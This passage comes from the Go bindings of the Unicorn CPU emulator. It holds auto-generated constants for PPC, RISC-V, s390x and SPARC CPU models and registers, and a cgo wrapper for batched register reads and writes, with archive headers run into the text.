CPU_PPC32_MPC8347T = 69 CPU_PPC32_MPC8347P = 70 CPU_PPC32_MPC8347AT = 71 CPU_PPC32_MPC8347AP = 72 CPU_PPC32_MPC8347ET = 73 CPU_PPC32_MPC8347EP = 74 CPU_PPC32_MPC8347EAT = 75 CPU_PPC32_MPC8347EAP = 76 CPU_PPC32_MPC8349 = 77 CPU_PPC32_MPC8349A = 78 CPU_PPC32_MPC8349E = 79 CPU_PPC32_MPC8349EA = 80 CPU_PPC32_MPC8377 = 81 CPU_PPC32_MPC8377E = 82 CPU_PPC32_MPC8378 = 83 CPU_PPC32_MPC8378E = 84 CPU_PPC32_MPC8379 = 85 CPU_PPC32_MPC8379E = 86 CPU_PPC32_E500_V10 = 87 CPU_PPC32_E500_V20 = 88 CPU_PPC32_E500V2_V10 = 89 CPU_PPC32_E500V2_V20 = 90 CPU_PPC32_E500V2_V21 = 91 CPU_PPC32_E500V2_V22 = 92 CPU_PPC32_E500V2_V30 = 93 CPU_PPC32_E500MC = 94 CPU_PPC32_MPC8533_V10 = 95 CPU_PPC32_MPC8533_V11 = 96 CPU_PPC32_MPC8533E_V10 = 97 CPU_PPC32_MPC8533E_V11 = 98 CPU_PPC32_MPC8540_V10 = 99 CPU_PPC32_MPC8540_V20 = 100 CPU_PPC32_MPC8540_V21 = 101 CPU_PPC32_MPC8541_V10 = 102 CPU_PPC32_MPC8541_V11 = 103 CPU_PPC32_MPC8541E_V10 = 104 CPU_PPC32_MPC8541E_V11 = 105 CPU_PPC32_MPC8543_V10 = 106 CPU_PPC32_MPC8543_V11 = 107 CPU_PPC32_MPC8543_V20 = 108 CPU_PPC32_MPC8543_V21 = 109 CPU_PPC32_MPC8543E_V10 = 110 CPU_PPC32_MPC8543E_V11 = 111 CPU_PPC32_MPC8543E_V20 = 112 CPU_PPC32_MPC8543E_V21 = 113 CPU_PPC32_MPC8544_V10 = 114 CPU_PPC32_MPC8544_V11 = 115 CPU_PPC32_MPC8544E_V10 = 116 CPU_PPC32_MPC8544E_V11 = 117 CPU_PPC32_MPC8545_V20 = 118 CPU_PPC32_MPC8545_V21 = 119 CPU_PPC32_MPC8545E_V20 = 120 CPU_PPC32_MPC8545E_V21 = 121 CPU_PPC32_MPC8547E_V20 = 122 CPU_PPC32_MPC8547E_V21 = 123 CPU_PPC32_MPC8548_V10 = 124 CPU_PPC32_MPC8548_V11 = 125 CPU_PPC32_MPC8548_V20 = 126 CPU_PPC32_MPC8548_V21 = 127 CPU_PPC32_MPC8548E_V10 = 128 CPU_PPC32_MPC8548E_V11 = 129 CPU_PPC32_MPC8548E_V20 = 130 CPU_PPC32_MPC8548E_V21 = 131 CPU_PPC32_MPC8555_V10 = 132 CPU_PPC32_MPC8555_V11 = 133 CPU_PPC32_MPC8555E_V10 = 134 CPU_PPC32_MPC8555E_V11 = 135 CPU_PPC32_MPC8560_V10 = 136 CPU_PPC32_MPC8560_V20 = 137 CPU_PPC32_MPC8560_V21 = 138 CPU_PPC32_MPC8567 = 139 CPU_PPC32_MPC8567E = 140 CPU_PPC32_MPC8568 = 141 CPU_PPC32_MPC8568E = 142 CPU_PPC32_MPC8572 = 143 CPU_PPC32_MPC8572E = 144 CPU_PPC32_E600 = 145 CPU_PPC32_MPC8610 = 146 CPU_PPC32_MPC8641 = 147 CPU_PPC32_MPC8641D = 148 CPU_PPC32_601_V0 = 149 CPU_PPC32_601_V1 = 150 CPU_PPC32_601_V2 = 151 CPU_PPC32_602 = 152 CPU_PPC32_603 = 153 CPU_PPC32_603E_V1_1 = 154 CPU_PPC32_603E_V1_2 = 155 CPU_PPC32_603E_V1_3 = 156 CPU_PPC32_603E_V1_4 = 157 CPU_PPC32_603E_V2_2 = 158 CPU_PPC32_603E_V3 = 159 CPU_PPC32_603E_V4 = 160 CPU_PPC32_603E_V4_1 = 161 CPU_PPC32_603E7 = 162 CPU_PPC32_603E7T = 163 CPU_PPC32_603E7V = 164 CPU_PPC32_603E7V1 = 165 CPU_PPC32_603E7V2 = 166 CPU_PPC32_603P = 167 CPU_PPC32_604 = 168 CPU_PPC32_604E_V1_0 = 169 CPU_PPC32_604E_V2_2 = 170 CPU_PPC32_604E_V2_4 = 171 CPU_PPC32_604R = 172 CPU_PPC32_740_V1_0 = 173 CPU_PPC32_750_V1_0 = 174 CPU_PPC32_740_V2_0 = 175 CPU_PPC32_750_V2_0 = 176 CPU_PPC32_740_V2_1 = 177 CPU_PPC32_750_V2_1 = 178 CPU_PPC32_740_V2_2 = 179 CPU_PPC32_750_V2_2 = 180 CPU_PPC32_740_V3_0 = 181 CPU_PPC32_750_V3_0 = 182 CPU_PPC32_740_V3_1 = 183 CPU_PPC32_750_V3_1 = 184 CPU_PPC32_740E = 185 CPU_PPC32_750E = 186 CPU_PPC32_740P = 187 CPU_PPC32_750P = 188 CPU_PPC32_750CL_V1_0 = 189 CPU_PPC32_750CL_V2_0 = 190 CPU_PPC32_750CX_V1_0 = 191 CPU_PPC32_750CX_V2_0 = 192 CPU_PPC32_750CX_V2_1 = 193 CPU_PPC32_750CX_V2_2 = 194 CPU_PPC32_750CXE_V2_1 = 195 CPU_PPC32_750CXE_V2_2 = 196 CPU_PPC32_750CXE_V2_3 = 197 CPU_PPC32_750CXE_V2_4 = 198 CPU_PPC32_750CXE_V2_4B = 199 CPU_PPC32_750CXE_V3_0 = 200 CPU_PPC32_750CXE_V3_1 = 201 CPU_PPC32_750CXE_V3_1B = 202 CPU_PPC32_750CXR = 203 CPU_PPC32_750FL = 204 CPU_PPC32_750FX_V1_0 = 205 CPU_PPC32_750FX_V2_0 = 206 CPU_PPC32_750FX_V2_1 = 207 CPU_PPC32_750FX_V2_2 = 208 CPU_PPC32_750FX_V2_3 = 209 CPU_PPC32_750GL = 210 CPU_PPC32_750GX_V1_0 = 211 CPU_PPC32_750GX_V1_1 = 212 CPU_PPC32_750GX_V1_2 = 213 CPU_PPC32_750L_V2_0 = 214 CPU_PPC32_750L_V2_1 = 215 CPU_PPC32_750L_V2_2 = 216 CPU_PPC32_750L_V3_0 = 217 CPU_PPC32_750L_V3_2 = 218 CPU_PPC32_745_V1_0 = 219 CPU_PPC32_755_V1_0 = 220 CPU_PPC32_745_V1_1 = 221 CPU_PPC32_755_V1_1 = 222 CPU_PPC32_745_V2_0 = 223 CPU_PPC32_755_V2_0 = 224 CPU_PPC32_745_V2_1 = 225 CPU_PPC32_755_V2_1 = 226 CPU_PPC32_745_V2_2 = 227 CPU_PPC32_755_V2_2 = 228 CPU_PPC32_745_V2_3 = 229 CPU_PPC32_755_V2_3 = 230 CPU_PPC32_745_V2_4 = 231 CPU_PPC32_755_V2_4 = 232 CPU_PPC32_745_V2_5 = 233 CPU_PPC32_755_V2_5 = 234 CPU_PPC32_745_V2_6 = 235 CPU_PPC32_755_V2_6 = 236 CPU_PPC32_745_V2_7 = 237 CPU_PPC32_755_V2_7 = 238 CPU_PPC32_745_V2_8 = 239 CPU_PPC32_755_V2_8 = 240 CPU_PPC32_7400_V1_0 = 241 CPU_PPC32_7400_V1_1 = 242 CPU_PPC32_7400_V2_0 = 243 CPU_PPC32_7400_V2_1 = 244 CPU_PPC32_7400_V2_2 = 245 CPU_PPC32_7400_V2_6 = 246 CPU_PPC32_7400_V2_7 = 247 CPU_PPC32_7400_V2_8 = 248 CPU_PPC32_7400_V2_9 = 249 CPU_PPC32_7410_V1_0 = 250 CPU_PPC32_7410_V1_1 = 251 CPU_PPC32_7410_V1_2 = 252 CPU_PPC32_7410_V1_3 = 253 CPU_PPC32_7410_V1_4 = 254 CPU_PPC32_7448_V1_0 = 255 CPU_PPC32_7448_V1_1 = 256 CPU_PPC32_7448_V2_0 = 257 CPU_PPC32_7448_V2_1 = 258 CPU_PPC32_7450_V1_0 = 259 CPU_PPC32_7450_V1_1 = 260 CPU_PPC32_7450_V1_2 = 261 CPU_PPC32_7450_V2_0 = 262 CPU_PPC32_7450_V2_1 = 263 CPU_PPC32_7441_V2_1 = 264 CPU_PPC32_7441_V2_3 = 265 CPU_PPC32_7451_V2_3 = 266 CPU_PPC32_7441_V2_10 = 267 CPU_PPC32_7451_V2_10 = 268 CPU_PPC32_7445_V1_0 = 269 CPU_PPC32_7455_V1_0 = 270 CPU_PPC32_7445_V2_1 = 271 CPU_PPC32_7455_V2_1 = 272 CPU_PPC32_7445_V3_2 = 273 CPU_PPC32_7455_V3_2 = 274 CPU_PPC32_7445_V3_3 = 275 CPU_PPC32_7455_V3_3 = 276 CPU_PPC32_7445_V3_4 = 277 CPU_PPC32_7455_V3_4 = 278 CPU_PPC32_7447_V1_0 = 279 CPU_PPC32_7457_V1_0 = 280 CPU_PPC32_7447_V1_1 = 281 CPU_PPC32_7457_V1_1 = 282 CPU_PPC32_7457_V1_2 = 283 CPU_PPC32_7447A_V1_0 = 284 CPU_PPC32_7457A_V1_0 = 285 CPU_PPC32_7447A_V1_1 = 286 CPU_PPC32_7457A_V1_1 = 287 CPU_PPC32_7447A_V1_2 = 288 CPU_PPC32_7457A_V1_2 = 289 CPU_PPC32_ENDING = 290 // PPC64 CPU CPU_PPC64_E5500 = 0 CPU_PPC64_E6500 = 1 CPU_PPC64_970_V2_2 = 2 CPU_PPC64_970FX_V1_0 = 3 CPU_PPC64_970FX_V2_0 = 4 CPU_PPC64_970FX_V2_1 = 5 CPU_PPC64_970FX_V3_0 = 6 CPU_PPC64_970FX_V3_1 = 7 CPU_PPC64_970MP_V1_0 = 8 CPU_PPC64_970MP_V1_1 = 9 CPU_PPC64_POWER5_V2_1 = 10 CPU_PPC64_POWER7_V2_3 = 11 CPU_PPC64_POWER7_V2_1 = 12 CPU_PPC64_POWER8E_V2_1 = 13 CPU_PPC64_POWER8_V2_0 = 14 CPU_PPC64_POWER8NVL_V1_0 = 15 CPU_PPC64_POWER9_V1_0 = 16 CPU_PPC64_POWER9_V2_0 = 17 CPU_PPC64_POWER10_V1_0 = 18 CPU_PPC64_ENDING = 19 // PPC registers PPC_REG_INVALID = 0 // General purpose registers PPC_REG_PC = 1 PPC_REG_0 = 2 PPC_REG_1 = 3 PPC_REG_2 = 4 PPC_REG_3 = 5 PPC_REG_4 = 6 PPC_REG_5 = 7 PPC_REG_6 = 8 PPC_REG_7 = 9 PPC_REG_8 = 10 PPC_REG_9 = 11 PPC_REG_10 = 12 PPC_REG_11 = 13 PPC_REG_12 = 14 PPC_REG_13 = 15 PPC_REG_14 = 16 PPC_REG_15 = 17 PPC_REG_16 = 18 PPC_REG_17 = 19 PPC_REG_18 = 20 PPC_REG_19 = 21 PPC_REG_20 = 22 PPC_REG_21 = 23 PPC_REG_22 = 24 PPC_REG_23 = 25 PPC_REG_24 = 26 PPC_REG_25 = 27 PPC_REG_26 = 28 PPC_REG_27 = 29 PPC_REG_28 = 30 PPC_REG_29 = 31 PPC_REG_30 = 32 PPC_REG_31 = 33 PPC_REG_CR0 = 34 PPC_REG_CR1 = 35 PPC_REG_CR2 = 36 PPC_REG_CR3 = 37 PPC_REG_CR4 = 38 PPC_REG_CR5 = 39 PPC_REG_CR6 = 40 PPC_REG_CR7 = 41 PPC_REG_FPR0 = 42 PPC_REG_FPR1 = 43 PPC_REG_FPR2 = 44 PPC_REG_FPR3 = 45 PPC_REG_FPR4 = 46 PPC_REG_FPR5 = 47 PPC_REG_FPR6 = 48 PPC_REG_FPR7 = 49 PPC_REG_FPR8 = 50 PPC_REG_FPR9 = 51 PPC_REG_FPR10 = 52 PPC_REG_FPR11 = 53 PPC_REG_FPR12 = 54 PPC_REG_FPR13 = 55 PPC_REG_FPR14 = 56 PPC_REG_FPR15 = 57 PPC_REG_FPR16 = 58 PPC_REG_FPR17 = 59 PPC_REG_FPR18 = 60 PPC_REG_FPR19 = 61 PPC_REG_FPR20 = 62 PPC_REG_FPR21 = 63 PPC_REG_FPR22 = 64 PPC_REG_FPR23 = 65 PPC_REG_FPR24 = 66 PPC_REG_FPR25 = 67 PPC_REG_FPR26 = 68 PPC_REG_FPR27 = 69 PPC_REG_FPR28 = 70 PPC_REG_FPR29 = 71 PPC_REG_FPR30 = 72 PPC_REG_FPR31 = 73 PPC_REG_LR = 74 PPC_REG_XER = 75 PPC_REG_CTR = 76 PPC_REG_MSR = 77 PPC_REG_FPSCR = 78 PPC_REG_CR = 79 PPC_REG_ENDING = 80 )unicorn-2.1.1/bindings/go/unicorn/reg_batch.go000066400000000000000000000042751467524106700213400ustar00rootroot00000000000000package unicorn import ( "errors" "runtime" "unsafe" ) /* #include void *reg_batch_setup(int *regs, int count, uint64_t **vals, int **enums, void ***refs) { size_t uvsz = sizeof(uint64_t) * count; size_t ensz = sizeof(int) * count; size_t ursz = sizeof(uintptr_t) * count; int i; uintptr_t buf = (uintptr_t)calloc(1, uvsz+ensz+ursz); if (buf == 0) return NULL; *vals = (uint64_t *)buf; *enums = (int *)(buf + uvsz); *refs = (void **)(buf + uvsz + ensz); for (i = 0; i < count; i++) { (*enums)[i] = regs[i]; (*refs)[i] = &(*vals)[i]; } return (void *)buf; } */ import "C" type RegBatch struct { // cast to local type vals []uint64 // pass these to C cenums *C.int crefs *unsafe.Pointer ccount C.int } func regBatchSetup(regs []int) (buf unsafe.Pointer, vals []uint64, cenums *C.int, crefs *unsafe.Pointer) { enums := make([]C.int, len(regs)) for i := 0; i < len(regs); i++ { enums[i] = C.int(regs[i]) } var cvals *C.uint64_t var inEnums *C.int if len(regs) > 0 { inEnums = (*C.int)(unsafe.Pointer(&enums[0])) } buf = C.reg_batch_setup(inEnums, C.int(len(regs)), &cvals, &cenums, &crefs) vals = (*[1 << 24]uint64)(unsafe.Pointer(cvals))[:len(regs)] return } func NewRegBatch(regs []int) (*RegBatch, error) { r := &RegBatch{} var buf unsafe.Pointer buf, r.vals, r.cenums, r.crefs = regBatchSetup(regs) if buf == nil { return nil, errors.New("failed to allocate RegBatch memory") } r.ccount = C.int(len(regs)) // when RegBatch is collected, free C-owned data runtime.SetFinalizer(r, func(r *RegBatch) { C.free(buf) }) return r, nil } // ReadFast skips copying and returns the internal vals array func (r *RegBatch) ReadFast(u Unicorn) ([]uint64, error) { ucerr := C.uc_reg_read_batch(u.Handle(), r.cenums, r.crefs, r.ccount) if ucerr != ERR_OK { return nil, errReturn(ucerr) } return r.vals, nil } func (r *RegBatch) Read(u Unicorn, vals []uint64) error { tmp, err := r.ReadFast(u) if err != nil { return err } copy(vals, tmp[:len(vals)]) return nil } func (r *RegBatch) Write(u Unicorn, vals []uint64) error { copy(r.vals[:len(vals)], vals) ucerr := C.uc_reg_write_batch(u.Handle(), r.cenums, r.crefs, r.ccount) return errReturn(ucerr) } unicorn-2.1.1/bindings/go/unicorn/riscv_const.go000066400000000000000000000144731467524106700217570ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [riscv_const.go] const ( // RISCV32 CPU CPU_RISCV32_ANY = 0 CPU_RISCV32_BASE32 = 1 CPU_RISCV32_SIFIVE_E31 = 2 CPU_RISCV32_SIFIVE_U34 = 3 CPU_RISCV32_ENDING = 4 // RISCV64 CPU CPU_RISCV64_ANY = 0 CPU_RISCV64_BASE64 = 1 CPU_RISCV64_SIFIVE_E51 = 2 CPU_RISCV64_SIFIVE_U54 = 3 CPU_RISCV64_ENDING = 4 // RISCV registers RISCV_REG_INVALID = 0 // General purpose registers RISCV_REG_X0 = 1 RISCV_REG_X1 = 2 RISCV_REG_X2 = 3 RISCV_REG_X3 = 4 RISCV_REG_X4 = 5 RISCV_REG_X5 = 6 RISCV_REG_X6 = 7 RISCV_REG_X7 = 8 RISCV_REG_X8 = 9 RISCV_REG_X9 = 10 RISCV_REG_X10 = 11 RISCV_REG_X11 = 12 RISCV_REG_X12 = 13 RISCV_REG_X13 = 14 RISCV_REG_X14 = 15 RISCV_REG_X15 = 16 RISCV_REG_X16 = 17 RISCV_REG_X17 = 18 RISCV_REG_X18 = 19 RISCV_REG_X19 = 20 RISCV_REG_X20 = 21 RISCV_REG_X21 = 22 RISCV_REG_X22 = 23 RISCV_REG_X23 = 24 RISCV_REG_X24 = 25 RISCV_REG_X25 = 26 RISCV_REG_X26 = 27 RISCV_REG_X27 = 28 RISCV_REG_X28 = 29 RISCV_REG_X29 = 30 RISCV_REG_X30 = 31 RISCV_REG_X31 = 32 // RISCV CSR RISCV_REG_USTATUS = 33 RISCV_REG_UIE = 34 RISCV_REG_UTVEC = 35 RISCV_REG_USCRATCH = 36 RISCV_REG_UEPC = 37 RISCV_REG_UCAUSE = 38 RISCV_REG_UTVAL = 39 RISCV_REG_UIP = 40 RISCV_REG_FFLAGS = 41 RISCV_REG_FRM = 42 RISCV_REG_FCSR = 43 RISCV_REG_CYCLE = 44 RISCV_REG_TIME = 45 RISCV_REG_INSTRET = 46 RISCV_REG_HPMCOUNTER3 = 47 RISCV_REG_HPMCOUNTER4 = 48 RISCV_REG_HPMCOUNTER5 = 49 RISCV_REG_HPMCOUNTER6 = 50 RISCV_REG_HPMCOUNTER7 = 51 RISCV_REG_HPMCOUNTER8 = 52 RISCV_REG_HPMCOUNTER9 = 53 RISCV_REG_HPMCOUNTER10 = 54 RISCV_REG_HPMCOUNTER11 = 55 RISCV_REG_HPMCOUNTER12 = 56 RISCV_REG_HPMCOUNTER13 = 57 RISCV_REG_HPMCOUNTER14 = 58 RISCV_REG_HPMCOUNTER15 = 59 RISCV_REG_HPMCOUNTER16 = 60 RISCV_REG_HPMCOUNTER17 = 61 RISCV_REG_HPMCOUNTER18 = 62 RISCV_REG_HPMCOUNTER19 = 63 RISCV_REG_HPMCOUNTER20 = 64 RISCV_REG_HPMCOUNTER21 = 65 RISCV_REG_HPMCOUNTER22 = 66 RISCV_REG_HPMCOUNTER23 = 67 RISCV_REG_HPMCOUNTER24 = 68 RISCV_REG_HPMCOUNTER25 = 69 RISCV_REG_HPMCOUNTER26 = 70 RISCV_REG_HPMCOUNTER27 = 71 RISCV_REG_HPMCOUNTER28 = 72 RISCV_REG_HPMCOUNTER29 = 73 RISCV_REG_HPMCOUNTER30 = 74 RISCV_REG_HPMCOUNTER31 = 75 RISCV_REG_CYCLEH = 76 RISCV_REG_TIMEH = 77 RISCV_REG_INSTRETH = 78 RISCV_REG_HPMCOUNTER3H = 79 RISCV_REG_HPMCOUNTER4H = 80 RISCV_REG_HPMCOUNTER5H = 81 RISCV_REG_HPMCOUNTER6H = 82 RISCV_REG_HPMCOUNTER7H = 83 RISCV_REG_HPMCOUNTER8H = 84 RISCV_REG_HPMCOUNTER9H = 85 RISCV_REG_HPMCOUNTER10H = 86 RISCV_REG_HPMCOUNTER11H = 87 RISCV_REG_HPMCOUNTER12H = 88 RISCV_REG_HPMCOUNTER13H = 89 RISCV_REG_HPMCOUNTER14H = 90 RISCV_REG_HPMCOUNTER15H = 91 RISCV_REG_HPMCOUNTER16H = 92 RISCV_REG_HPMCOUNTER17H = 93 RISCV_REG_HPMCOUNTER18H = 94 RISCV_REG_HPMCOUNTER19H = 95 RISCV_REG_HPMCOUNTER20H = 96 RISCV_REG_HPMCOUNTER21H = 97 RISCV_REG_HPMCOUNTER22H = 98 RISCV_REG_HPMCOUNTER23H = 99 RISCV_REG_HPMCOUNTER24H = 100 RISCV_REG_HPMCOUNTER25H = 101 RISCV_REG_HPMCOUNTER26H = 102 RISCV_REG_HPMCOUNTER27H = 103 RISCV_REG_HPMCOUNTER28H = 104 RISCV_REG_HPMCOUNTER29H = 105 RISCV_REG_HPMCOUNTER30H = 106 RISCV_REG_HPMCOUNTER31H = 107 RISCV_REG_MCYCLE = 108 RISCV_REG_MINSTRET = 109 RISCV_REG_MCYCLEH = 110 RISCV_REG_MINSTRETH = 111 RISCV_REG_MVENDORID = 112 RISCV_REG_MARCHID = 113 RISCV_REG_MIMPID = 114 RISCV_REG_MHARTID = 115 RISCV_REG_MSTATUS = 116 RISCV_REG_MISA = 117 RISCV_REG_MEDELEG = 118 RISCV_REG_MIDELEG = 119 RISCV_REG_MIE = 120 RISCV_REG_MTVEC = 121 RISCV_REG_MCOUNTEREN = 122 RISCV_REG_MSTATUSH = 123 RISCV_REG_MUCOUNTEREN = 124 RISCV_REG_MSCOUNTEREN = 125 RISCV_REG_MHCOUNTEREN = 126 RISCV_REG_MSCRATCH = 127 RISCV_REG_MEPC = 128 RISCV_REG_MCAUSE = 129 RISCV_REG_MTVAL = 130 RISCV_REG_MIP = 131 RISCV_REG_MBADADDR = 132 RISCV_REG_SSTATUS = 133 RISCV_REG_SEDELEG = 134 RISCV_REG_SIDELEG = 135 RISCV_REG_SIE = 136 RISCV_REG_STVEC = 137 RISCV_REG_SCOUNTEREN = 138 RISCV_REG_SSCRATCH = 139 RISCV_REG_SEPC = 140 RISCV_REG_SCAUSE = 141 RISCV_REG_STVAL = 142 RISCV_REG_SIP = 143 RISCV_REG_SBADADDR = 144 RISCV_REG_SPTBR = 145 RISCV_REG_SATP = 146 RISCV_REG_HSTATUS = 147 RISCV_REG_HEDELEG = 148 RISCV_REG_HIDELEG = 149 RISCV_REG_HIE = 150 RISCV_REG_HCOUNTEREN = 151 RISCV_REG_HTVAL = 152 RISCV_REG_HIP = 153 RISCV_REG_HTINST = 154 RISCV_REG_HGATP = 155 RISCV_REG_HTIMEDELTA = 156 RISCV_REG_HTIMEDELTAH = 157 // Floating-point registers RISCV_REG_F0 = 158 RISCV_REG_F1 = 159 RISCV_REG_F2 = 160 RISCV_REG_F3 = 161 RISCV_REG_F4 = 162 RISCV_REG_F5 = 163 RISCV_REG_F6 = 164 RISCV_REG_F7 = 165 RISCV_REG_F8 = 166 RISCV_REG_F9 = 167 RISCV_REG_F10 = 168 RISCV_REG_F11 = 169 RISCV_REG_F12 = 170 RISCV_REG_F13 = 171 RISCV_REG_F14 = 172 RISCV_REG_F15 = 173 RISCV_REG_F16 = 174 RISCV_REG_F17 = 175 RISCV_REG_F18 = 176 RISCV_REG_F19 = 177 RISCV_REG_F20 = 178 RISCV_REG_F21 = 179 RISCV_REG_F22 = 180 RISCV_REG_F23 = 181 RISCV_REG_F24 = 182 RISCV_REG_F25 = 183 RISCV_REG_F26 = 184 RISCV_REG_F27 = 185 RISCV_REG_F28 = 186 RISCV_REG_F29 = 187 RISCV_REG_F30 = 188 RISCV_REG_F31 = 189 RISCV_REG_PC = 190 RISCV_REG_ENDING = 191 // Alias registers RISCV_REG_ZERO = 1 RISCV_REG_RA = 2 RISCV_REG_SP = 3 RISCV_REG_GP = 4 RISCV_REG_TP = 5 RISCV_REG_T0 = 6 RISCV_REG_T1 = 7 RISCV_REG_T2 = 8 RISCV_REG_S0 = 9 RISCV_REG_FP = 9 RISCV_REG_S1 = 10 RISCV_REG_A0 = 11 RISCV_REG_A1 = 12 RISCV_REG_A2 = 13 RISCV_REG_A3 = 14 RISCV_REG_A4 = 15 RISCV_REG_A5 = 16 RISCV_REG_A6 = 17 RISCV_REG_A7 = 18 RISCV_REG_S2 = 19 RISCV_REG_S3 = 20 RISCV_REG_S4 = 21 RISCV_REG_S5 = 22 RISCV_REG_S6 = 23 RISCV_REG_S7 = 24 RISCV_REG_S8 = 25 RISCV_REG_S9 = 26 RISCV_REG_S10 = 27 RISCV_REG_S11 = 28 RISCV_REG_T3 = 29 RISCV_REG_T4 = 30 RISCV_REG_T5 = 31 RISCV_REG_T6 = 32 RISCV_REG_FT0 = 158 RISCV_REG_FT1 = 159 RISCV_REG_FT2 = 160 RISCV_REG_FT3 = 161 RISCV_REG_FT4 = 162 RISCV_REG_FT5 = 163 RISCV_REG_FT6 = 164 RISCV_REG_FT7 = 165 RISCV_REG_FS0 = 166 RISCV_REG_FS1 = 167 RISCV_REG_FA0 = 168 RISCV_REG_FA1 = 169 RISCV_REG_FA2 = 170 RISCV_REG_FA3 = 171 RISCV_REG_FA4 = 172 RISCV_REG_FA5 = 173 RISCV_REG_FA6 = 174 RISCV_REG_FA7 = 175 RISCV_REG_FS2 = 176 RISCV_REG_FS3 = 177 RISCV_REG_FS4 = 178 RISCV_REG_FS5 = 179 RISCV_REG_FS6 = 180 RISCV_REG_FS7 = 181 RISCV_REG_FS8 = 182 RISCV_REG_FS9 = 183 RISCV_REG_FS10 = 184 RISCV_REG_FS11 = 185 RISCV_REG_FT8 = 186 RISCV_REG_FT9 = 187 RISCV_REG_FT10 = 188 RISCV_REG_FT11 = 189 )unicorn-2.1.1/bindings/go/unicorn/s390x_const.go000066400000000000000000000045611467524106700215140ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [s390x_const.go] const ( // S390X CPU CPU_S390X_Z900 = 0 CPU_S390X_Z900_2 = 1 CPU_S390X_Z900_3 = 2 CPU_S390X_Z800 = 3 CPU_S390X_Z990 = 4 CPU_S390X_Z990_2 = 5 CPU_S390X_Z990_3 = 6 CPU_S390X_Z890 = 7 CPU_S390X_Z990_4 = 8 CPU_S390X_Z890_2 = 9 CPU_S390X_Z990_5 = 10 CPU_S390X_Z890_3 = 11 CPU_S390X_Z9EC = 12 CPU_S390X_Z9EC_2 = 13 CPU_S390X_Z9BC = 14 CPU_S390X_Z9EC_3 = 15 CPU_S390X_Z9BC_2 = 16 CPU_S390X_Z10EC = 17 CPU_S390X_Z10EC_2 = 18 CPU_S390X_Z10BC = 19 CPU_S390X_Z10EC_3 = 20 CPU_S390X_Z10BC_2 = 21 CPU_S390X_Z196 = 22 CPU_S390X_Z196_2 = 23 CPU_S390X_Z114 = 24 CPU_S390X_ZEC12 = 25 CPU_S390X_ZEC12_2 = 26 CPU_S390X_ZBC12 = 27 CPU_S390X_Z13 = 28 CPU_S390X_Z13_2 = 29 CPU_S390X_Z13S = 30 CPU_S390X_Z14 = 31 CPU_S390X_Z14_2 = 32 CPU_S390X_Z14ZR1 = 33 CPU_S390X_GEN15A = 34 CPU_S390X_GEN15B = 35 CPU_S390X_QEMU = 36 CPU_S390X_MAX = 37 CPU_S390X_ENDING = 38 // S390X registers S390X_REG_INVALID = 0 // General purpose registers S390X_REG_R0 = 1 S390X_REG_R1 = 2 S390X_REG_R2 = 3 S390X_REG_R3 = 4 S390X_REG_R4 = 5 S390X_REG_R5 = 6 S390X_REG_R6 = 7 S390X_REG_R7 = 8 S390X_REG_R8 = 9 S390X_REG_R9 = 10 S390X_REG_R10 = 11 S390X_REG_R11 = 12 S390X_REG_R12 = 13 S390X_REG_R13 = 14 S390X_REG_R14 = 15 S390X_REG_R15 = 16 // Floating point registers S390X_REG_F0 = 17 S390X_REG_F1 = 18 S390X_REG_F2 = 19 S390X_REG_F3 = 20 S390X_REG_F4 = 21 S390X_REG_F5 = 22 S390X_REG_F6 = 23 S390X_REG_F7 = 24 S390X_REG_F8 = 25 S390X_REG_F9 = 26 S390X_REG_F10 = 27 S390X_REG_F11 = 28 S390X_REG_F12 = 29 S390X_REG_F13 = 30 S390X_REG_F14 = 31 S390X_REG_F15 = 32 S390X_REG_F16 = 33 S390X_REG_F17 = 34 S390X_REG_F18 = 35 S390X_REG_F19 = 36 S390X_REG_F20 = 37 S390X_REG_F21 = 38 S390X_REG_F22 = 39 S390X_REG_F23 = 40 S390X_REG_F24 = 41 S390X_REG_F25 = 42 S390X_REG_F26 = 43 S390X_REG_F27 = 44 S390X_REG_F28 = 45 S390X_REG_F29 = 46 S390X_REG_F30 = 47 S390X_REG_F31 = 48 // Access registers S390X_REG_A0 = 49 S390X_REG_A1 = 50 S390X_REG_A2 = 51 S390X_REG_A3 = 52 S390X_REG_A4 = 53 S390X_REG_A5 = 54 S390X_REG_A6 = 55 S390X_REG_A7 = 56 S390X_REG_A8 = 57 S390X_REG_A9 = 58 S390X_REG_A10 = 59 S390X_REG_A11 = 60 S390X_REG_A12 = 61 S390X_REG_A13 = 62 S390X_REG_A14 = 63 S390X_REG_A15 = 64 S390X_REG_PC = 65 S390X_REG_PSWM = 66 S390X_REG_ENDING = 67 // Alias registers )unicorn-2.1.1/bindings/go/unicorn/sparc_const.go000066400000000000000000000056751467524106700217450ustar00rootroot00000000000000package unicorn // For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.go] const ( // SPARC32 CPU CPU_SPARC32_FUJITSU_MB86904 = 0 CPU_SPARC32_FUJITSU_MB86907 = 1 CPU_SPARC32_TI_MICROSPARC_I = 2 CPU_SPARC32_TI_MICROSPARC_II = 3 CPU_SPARC32_TI_MICROSPARC_IIEP = 4 CPU_SPARC32_TI_SUPERSPARC_40 = 5 CPU_SPARC32_TI_SUPERSPARC_50 = 6 CPU_SPARC32_TI_SUPERSPARC_51 = 7 CPU_SPARC32_TI_SUPERSPARC_60 = 8 CPU_SPARC32_TI_SUPERSPARC_61 = 9 CPU_SPARC32_TI_SUPERSPARC_II = 10 CPU_SPARC32_LEON2 = 11 CPU_SPARC32_LEON3 = 12 CPU_SPARC32_ENDING = 13 // SPARC64 CPU CPU_SPARC64_FUJITSU = 0 CPU_SPARC64_FUJITSU_III = 1 CPU_SPARC64_FUJITSU_IV = 2 CPU_SPARC64_FUJITSU_V = 3 CPU_SPARC64_TI_ULTRASPARC_I = 4 CPU_SPARC64_TI_ULTRASPARC_II = 5 CPU_SPARC64_TI_ULTRASPARC_III = 6 CPU_SPARC64_TI_ULTRASPARC_IIE = 7 CPU_SPARC64_SUN_ULTRASPARC_III = 8 CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9 CPU_SPARC64_SUN_ULTRASPARC_IIII = 10 CPU_SPARC64_SUN_ULTRASPARC_IV = 11 CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12 CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13 CPU_SPARC64_SUN_ULTRASPARC_T1 = 14 CPU_SPARC64_SUN_ULTRASPARC_T2 = 15 CPU_SPARC64_NEC_ULTRASPARC_I = 16 